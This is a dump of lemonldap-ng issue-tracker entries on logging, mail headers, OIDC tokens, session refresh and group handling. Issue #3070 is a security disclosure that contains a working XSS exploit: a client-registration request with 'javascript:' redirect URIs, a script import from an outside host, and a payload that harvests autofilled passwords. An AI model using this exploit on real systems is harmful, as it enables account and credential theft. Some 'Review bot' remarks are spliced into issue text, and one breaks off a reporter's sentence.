# lemonldap-ng issues
Feed: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues
Updated: 2024-02-01T17:14:32Z

## #3096 No more logs Session granted for *
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3096
Updated: 2024-02-01T17:14:32Z | Author: dcoutadeur dcoutadeur

As stated by the documentation:
https://lemonldap-ng.org/documentation/2.0/logs.html#user-log-samples
we should have a log displaying the logged-in user and their IP address:
```
[notice] Session granted for dwho by LDAP (81.20.13.21)
```
However, now, the log is managed by the GrantSession plugin, which is not enabled by default, as in configuration we have:
```
'grantSessionRules' => {}
```
and an empty hash is considered disabled.
This issue is just to discuss the desired behaviour:
- set a default value:
```
'grantSessionRules' => {
'always allowed##default_rule' => 1
}
```
- fix the documentation to indicate that there is no log by default, except if the admin sets a grantSessionRule

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3095 Add llngUserAttributes tools
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3095
Updated: 2024-03-27T09:16:32Z | Author: Yadd

The idea is to have a sort of `ldapsearch` but based on portal "getUser+macros+groups". Maybe something like:
```perl
#!/usr/bin/perl
use strict;
use JSON;
use Lemonldap::NG::Portal;

my $p = Lemonldap::NG::Portal->new;
$p->init( { logLevel => 'warn' } );

my $uid = $ARGV[0] or die 'Missing uid';

my $req = Lemonldap::NG::Portal::Main::Request->new( {
    REQUEST_URI => '/',
    REMOTE_ADDR => '127.0.0.1',
    PATH_INFO   => '/',
} );
$req->user($uid);
$req->steps( [
    'getUser',        @{ $p->betweenAuthAndData },
    'setSessionInfo', $p->groupsAndMacros,
    'setLocalGroups',
] );
$p->process($req);
print JSON->new->canonical->pretty->encode( $req->sessionInfo );
```
What do you think?

Milestone: 2.19.0 | Assignee: Yadd

## #3094 add a portalCustomJs option
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3094
Updated: 2024-01-26T13:56:53Z | Author: Maxime Besson

We already have a very simple way to add CSS code to the portal without creating a new theme: portalCustomCss
It can be useful to add some JS too, if you need to hook to some jQuery events or just simple JS customization.

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3093 mails not delivered since 2.18 due to invalid "to:" format
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3093
Updated: 2024-02-06T09:16:32Z | Author: dcoutadeur dcoutadeur

### Affected version
Version: 2.18.1
Platform: Nginx
### Summary
When llng sends a password reset mail, the mail is not received due to an invalid "to:" field.
For example:
```
To: david.coutadeur@worteks.com <david.coutadeur@worteks.com>
```
When received by smtp.office365.com, this mail is displayed as:
```
To: david.coutadeur@
BCC: <david.coutadeur@worteks.com>
```
Consequence: the mail *is* received by the user, because of the BCC field (I don't know how this field is added though), but the admin also receives a "non-delivery" mail.
### Logs
```
Content-Type: text/plain; charset="utf-8"
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.509 (Entity 5.509)
From: admin@customer.org
To: david.coutadeur@worteks.com <david.coutadeur@worteks.com>
Subject: =?utf-8?B?W0N1c3RvbWVyXSBSw6lpbml0aWFsaXNhdGlvbiBkZSBtb3QgZGUgcGFzc2U=?=
Date: Thu, 25 Jan 2024 14:45:22 +0000
Bonjour David Coutadeur,
Cliquez ici pour réinitialiser votre mot de passe :
https://auth.demo.fusioniam.org/resetpwd?mail_token=9683247caf1aaaf29051a7ff0d8157b3559d60743f8e83429c3496b60c8daa64&skin=bootstrap
Pour tout problème d’authentification merci d’écrire à admin@customer.org';
```
### Possible fixes
The problem seems to be linked to: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2990 and especially https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/commit/962effa8bfbe200c7b1555f60af9cbc1ad4f4be2
According to this RFC: https://datatracker.ietf.org/doc/html/rfc822#section-3.1.1 the following syntax should be used:
```
To: "david.coutadeur@worteks.com" <david.coutadeur@worteks.com>
```
If you are ok @guimard, I propose to patch this into:
```perl
if ( $mail =~ /^\S+\@\S+$/ ) {
    $mail = "\"$mail\" <$mail>";
}
```

Milestone: 2.18.2 | Assignee: dcoutadeur dcoutadeur

## #3092 Display an error message when issuer context is not restored
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3092
Updated: 2024-01-25T15:49:33Z | Author: Maxime Besson

### Affected version
Version: 2.18.1
### Summary
* Configure LLNG as an SAML/OIDC or CAS issuer
* Initialize login from a SP
* Log in using 2FA, SAML or something else that takes longer than issuersTimeout to perform
* Login works, but you are redirected either to the portal (SAML/CAS) or an error message (OIDC)
### Logs
```
[INFO] Bad (or expired) token 1706124567_32351
[ERROR] Unknown response type:
```
### Possible fixes
The user often gets confused about ending up on the portal; we should at least give them an error message that says they took too long, so that they can understand why the application isn't displayed.

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3091 Send mail on password change doesn't work correctly
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3091
Updated: 2024-03-27T10:46:54Z | Author: Gabriele Licari

### Affected version
Version: 2.18.1
Good Morning,
The option "Send a mail when password is changed" is activated, but users receive confirmation of the password change only when they force the reset (forgotten password), not when they change it independently once logged in. What can I check to fix this?
This seems to be a bug.

Milestone: 2.19.0 | Assignee: Clément OUDOT

## #3088 Extend session lifetime when refreshing session/access token
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3088
Updated: 2024-01-27T19:11:12Z | Author: Maxime Besson

Related to #2700
Currently, when the user obtains a new access token for a RP using a refresh token, the session is not extended (timeoutActivity/_lastSeen)
This action should be considered as session activity and thus extend the session duration
Maybe this should also be the case when sessions are refreshed by the Refresh session API plugin ?
OK for you @guimard / @clement_oudot?

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3087 RefreshSession plugin creates group duplicates when multiple sessions are used
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3087
Updated: 2024-03-26T12:28:10Z | Author: Maxime Besson

### Affected version
Version: 2.18.1
### Summary
* Enable refresh session plugin
* Login as dwho twice
* Refresh sessions for dwho with the plugin
* Groups are duplicated in $groups
### Logs
```
Store users; timelords; users; timelords in session key groups
```

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3084 JWT shouldn't have a "kid" when using symmetric sign algorithm
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3084
Updated: 2024-01-17T09:54:11Z | Author: Jérémie Pierson

### Affected version
Version: 2.18.1
Platform: Nginx
### Summary
When using HS256 (or 384 | 512) as ID Token signature algorithm in an OpenIDConnect Relying Party, a "kid" property is added even though no asymmetric key will be used. This confuses Apache mod-auth-openidc (latest version in Debian), which fails to verify the signature and rejects the token.
Note : this manifests only because we do have RSA signing keys with a "kid" configured in OpenID Connect Service.
### Possible fixes
I tried to remove the following three lines in Portal/Lib/OpenIDConnect.pm :
```
--- Portal/Lib/OpenIDConnect.pm.ori 2024-01-15 14:56:20.675925536 +0100
+++ Portal/Lib/OpenIDConnect.pm 2024-01-15 14:52:27.247075049 +0100
@@ -2267,9 +2267,6 @@
encode_jwt(
payload => to_json($payload),
alg => $alg,
- extra_headers => {
- kid => $self->conf->{oidcServiceKeyIdSig},
- },
@keyArg,
);
};
```
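Review bot: the hunk removes `extra_headers => { kid => $self->conf->{oidcServiceKeyIdSig} }` for every algorithm, not only HS*, so RS256 and the other asymmetric ID Tokens would also lose their `kid`, which is what lets an RP pick the right signing key out of the OP's JWKS when more than one key is published. Suggest keeping the header for asymmetric algorithms and omitting it only for symmetric ones (build the `extra_headers` hash conditionally on `$alg =~ /^HS/` before the `encode_jwt` call), and widening the check mentioned after the diff from "HS256 and RS256 only" to each asymmetric algorithm the OP offers so the `kid` is verified present there.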
and it does seem to fix this problem (tested only with HS256 and RS256).
May be related to commit 7a407da7d8cb642fd5b5ec24fa35d5c38aab5e24; seems like a previous issue #3066 was fixed two times in parallel :-)

Milestone: 2.18.2 | Assignee: Maxime Besson

## #3083 OIDC Special-scope hook system
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3083
Updated: 2024-01-17T03:58:50Z | Author: Yadd

### Summary
The idea is to provide a plugin system to be able to add special scopes in OIDC flow (scopes not related to user's attributes).
### Design proposition
Special plugin keyword

Milestone: In discussion | Assignee: Yadd

## #3081 oidcDropCspHeaders shouldn't drop CORS headers
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3081
Updated: 2024-01-17T09:51:29Z | Author: Yadd

When using this option, if the relying party is inside a web app, Chromium refuses to download OIDC metadata because of the lack of CORS headers.
Fixed by !432

Milestone: 2.18.2 | Assignee: Yadd

## #3080 Allow users to retry 2FA
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3080
Updated: 2024-03-07T09:45:45Z | Author: Maxime Besson

### Summary
Currently, users get only one try to enter their 2FA; if they fail, they need to retry the entire login flow.
### Design proposition
We should implement a count-limited (maybe 3 by default?) retry in 2F::Engine

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3079 UserDB::OpenIDConnect doesn't handle arrays of values
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3079
Updated: 2024-01-17T08:26:28Z | Author: Maxime Besson

### Affected version
Version: 2.18.1
### Summary
* Configure an OIDC OP to send multi valued claims
* Configure that claim as an exported attribute in LLNG
* Exported attribute is stored as an arrayref
### Logs
```
[debug] Store ARRAY(0x6390dd0) in session key groups
```

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3078 Allow transmission of extra attributes in Auth/UserDB/Password::REST
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3078
Updated: 2024-03-27T10:26:26Z | Author: Maxime Besson

Currently, it's possible to transmit extra attributes in 2F::REST but not in Auth::REST etc.

Milestone: Backlog | Assignee: Maxime Besson

## #3077 Handling of groups from an OIDC provider
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3077
Updated: 2024-03-27T09:14:16Z | Author: Daniel Berteaud

### Affected version
Version: 2.18.1
Platform: nginx+uwsgi
### Summary
When using an OIDC provider as Auth + UserDB, I couldn't get groups to work. In my case, the OIDC provider is also a Lemonldap::NG instance. I've configured a "groups" claim containing a list of groups on the provider. This claim is correctly sent in the UserInfo endpoint. The "slave" Lemonldap::NG instance sees it, but just sets the groups session key to a stringified version of the array of groups. $hGroups remains empty, and groups are not usable.
### Logs
```
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Request User Info on https://primary.local/oauth2/userinfo with access token XXXXXXX
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] UserInfo received: {"mail":"dani@local","cn":"Daniel Berteaud","groups":["Role_Unix","Role_Dev","Role_DB_Viewer","Administrators","Role_DB_Admin","Role_GED","Role_Mail","Role_Support_Admin","Role_PKI_User","Role_Infra_Admin","Denied RODC Password Replication Group","Domain Admins","Role_Vault","Role_Visio","Role_VPN","Role_FW_Admin","Role_Audit","Equipe","Role_Seafile","Role_PKI_Admin","Role_Monitoring","IT","Role_Support_User","Role_Virt","Role_CT_Admin","Role_Matrix"],"principal":"dani@local","uid":"dani","sub":"dani"}
[...]
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store 1704448287 in session key _lastAuthnUTime
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store HASH(0x65f8a60) in session key _loginHistory
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Dump: $VAR1 = {'successLogin' => [{'ipAddr' => '10.99.20.2','_utime' => '1704448211'},{'ipAddr' => '10.99.20.2','_utime' => '1704448149'},{'ipAddr' => '10.99.20.2','error' => -4,'_utime' => '1704443859'},{'ipAddr' => '10.99.20.2','_utime' => '1704443859'},{'_utime' => '1704443073','error' => -4,'ipAddr' => '10.99.20.2'},{'ipAddr' => '10.99.20.2','_utime' => '1704443073'},{'_utime' => '1704442587','ipAddr' => '10.99.20.2','error' => -4},{'ipAddr' => '10.99.20.2','_utime' => '1704442587'},{'ipAddr' => '10.99.20.2','_utime' => '1704378084'},{'ipAddr' => '10.99.20.2','_utime' => '1704377346'}],'failedLogin' => []};
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store ARRAY(0x6390dd0) in session key groups
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Dump: $VAR1 = ['Role_Unix','Role_Dev','Role_DB_Viewer','Administrators','Role_DB_Admin','Role_GED','Role_Mail','Role_Support_Admin','Role_PKI_User','Role_Infra_Admin','Denied RODC Password Replication Group','Domain Admins','Role_Vault','Role_Visio','Role_VPN','Role_FW_Admin','Role_Audit','Equipe','Role_Seafile','Role_PKI_Admin','Role_Monitoring','IT','Role_Support_User','Role_Virt','Role_CT_Admin','Role_Matrix'];
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store 20240105105011 in session key _updateTime
2024-01-05 10:51:27 [ERROR] [lemonldap] [Fri Jan 5 10:51:27 2024] [LLNG:40] [debug] Store dani in session key _user
```
Screenshot of the resulting session on the slave Lemonldap::NG
![image](/uploads/fc6bddce1c364b8c0ab943920f603df4/image.png)
### Backends used
Primary (OIDC RP) Lemonldap::NG is running
- On almalinux 8
- With nginx (OpenResty) + llng-fastcgi-server
- Using AD (samba4) as AuthDB and UserDB
- Using MariaDB as configuration and session store
Slave Lemonldap::NG is running
- On almalinux 9 (Docker based on almalinux9)
- With nginx + uwsgi
- Using OIDC as AuthDB and Same as UserDB
- An OIDC provider has been configured pointing at the primary LL::NG portal

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3076 RefreshSession plugin doesn't work with choice
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3076
Updated: 2024-03-26T12:29:14Z | Author: Maxime Besson

### Affected version
Version: 2.18.1
### Summary
* Configure Auth::Choice
* Enable RefreshSession plugin
* Login
* refresh using the /refreshsession API
* it fails because _choice isn't set
### Logs
```
[debug] Start routing refreshsessions
[notice] Refresh request for abarnes
[debug] [notice] Refresh request for abarnes
[debug] Processing getUser
[debug] Returned error: 9 (PE_FIRSTACCESS)
[warn] Refresh failed for session 1b4228c3aea6021e271c7ce7c8acccec663ac91f5c00dd02f9379e3b53495e5d
```
### Possible fixes
populate userData in $req with all session attributes (including _choice) before calling the portal refresh function:
```
diff --git a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
index 6334b4508..8fd6935f4 100644
--- a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
+++ b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/Refresh.pm
@@ -36,6 +36,7 @@ sub run {
);
$req->id($id);
$req->user( $info->{uid} );
+ $req->userData( $sessions->{$id} );
my $res;
eval { $res = $self->p->refresh($req); };
if ($@) {
```
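Review bot: the added `$req->userData( $sessions->{$id} );` line hands the whole stored session hash to the refresh flow, so getUser and the plugins now read `_choice` (and every other key) from the persisted copy; if `$info` on the preceding `$req->user( $info->{uid} );` line is already that same session hash, reuse it rather than looking up `$sessions->{$id}` a second time, and add a regression test that logs in through Auth::Choice and calls /refreshsession so the `PE_FIRSTACCESS` failure shown in the logs above is covered.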
Does it look ok for you @guimard?

Milestone: 2.19.0 | Assignee: Maxime Besson

## #3073 [OIDC] Implement optional "Passing Request Parameters as JWTs"
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3073
Updated: 2024-01-03T03:56:43Z | Author: Yadd

See [OIDC Core - JWTRequests](https://openid.net/specs/openid-connect-core-1_0.html#JWTRequests)
Already implemented on OP side, missing in RP.
Needed by #3030

Milestone: 2.19.0 | Assignee: Yadd

## #3070 [Security:low] XSS via JavaScript-URI as Redirect URI and form_post Response Mode
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3070
Updated: 2024-02-12T02:44:25Z | Author: Lauritz Holtmann

*LEMONLDAP::NG* is vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`.
## Steps to Reproduce
Preparation:
1. Enable Public Registration via http://manager.example.com/ -> OpenID Connect Service -> Dynamic Registration (alternatively register a client via UI in the following).
2. Enable to drop CSP on Auth. Responses via http://manager.example.com/ -> OpenID Connect Service -> Security -> Drop CSP headers from OIDC responses (otherwise XSS would be blocked by browsers that support CSP directives).
Then perform the actual attack:
1. Register new Client using OIDC Dynamic Client registration:
```http
POST /oauth2/register HTTP/1.1
Host: auth.example.com
Content-Type: application/json
Content-Length: 140
{
"redirect_uris":["javascript:confirm(document.domain)","javascript:import('https://xss.lhq.at/password-disclosure.js')"]
}
```
2. Trigger XSS via `http://auth.example.com/oauth2/authorize?client_id=yCbq4Y6VZONzcrGdwVLaNgnG0Am81Q&response_type=code&response_mode=form_post&scope=openid&redirect_uri=javascript:confirm(document.domain)` (Adjust client_id)
## Impact
As shown above, JavaScript is evaluated in the context of `http://auth.example.com/`, allowing an attacker to perform arbitrary actions on behalf of an end-user and in their session.
Further, end-user credentials can be obtained in case a victim uses a password manager that auto-fills login forms. In the following, we assume the victim uses a current Firefox.
JS-Exploit-Payload: https://xss.lhq.at/password-disclosure.js
```JavaScript
window.attackUsernameField = document.createElement("input");
window.attackPasswordField = document.createElement("input");
attackUsernameField.type = 'text';
attackUsernameField.name = 'username';
attackPasswordField.type = 'password';
attackPasswordField.autocomplete = 'current-password';
attackPasswordField.addEventListener("change",()=>{alert(`Username: ${attackUsernameField.value}\nPassword: ${attackPasswordField.value}`)});
document.body.appendChild(attackUsernameField);
document.body.appendChild(attackPasswordField);
```
Note that FF only auto-fills credentials in secure contexts (HTTPS), so that testing this may require additional configuration.
To test password disclosure, use current Firefox and:
1. Browse `https://auth.example.com/` and enter exemplary invalid credentials. Opt-in to store credentials in your browser!
2. Browse `https://auth.example.com/oauth2/authorize?client_id=lhibBNkkd4w8hPLPxjehY8fAT2MD/L&response_type=code&response_mode=form_post&scope=openid&redirect_uri=javascript:import(%27https://xss.lhq.at/password-disclosure.js%27)` and observe `alert()` with clear text credentials.
The impact is limited by a Content-Security-Policy directive which was enabled by default in my test setup. There is a specific option to disable this setting and there are still browsers out-there and in use that do not support CSP directives.
## Recommendation
It is recommended not to allow dangerous schemes such as `javascript`, `data` or `vbscript` as allowed Redirect URIs.

Milestone: 2.18.2 | Assignee: Yadd

## #3068 Regression in configuration reload
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3068
Updated: 2023-12-22T22:56:15Z | Author: Maxime Besson

I am able to reproduce a rather strange regression caused by ec8b3e30e9f38900addf96c7033d4c7d99f0d9f7
* Only when one of my vhosts uses logout_app_sso
* A config change in the manager is not immediately applied on the portal (checkConf=1 in llng.ini)
* Config changes in the CLI are immediately applied
low priority but annoying

Milestone: 2.18.1 | Assignee: Maxime Besson

## #3067 Error when verifying signature when OP uses more than one key and kid missing in ID Token
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3067
Updated: 2023-12-21T17:42:23Z | Author: Maxime Besson

cf #3065
This is not permitted in OIDC but we might want to support it for some applications / older LLNG releases
MR !423

Milestone: 2.18.1 | Assignee: Yadd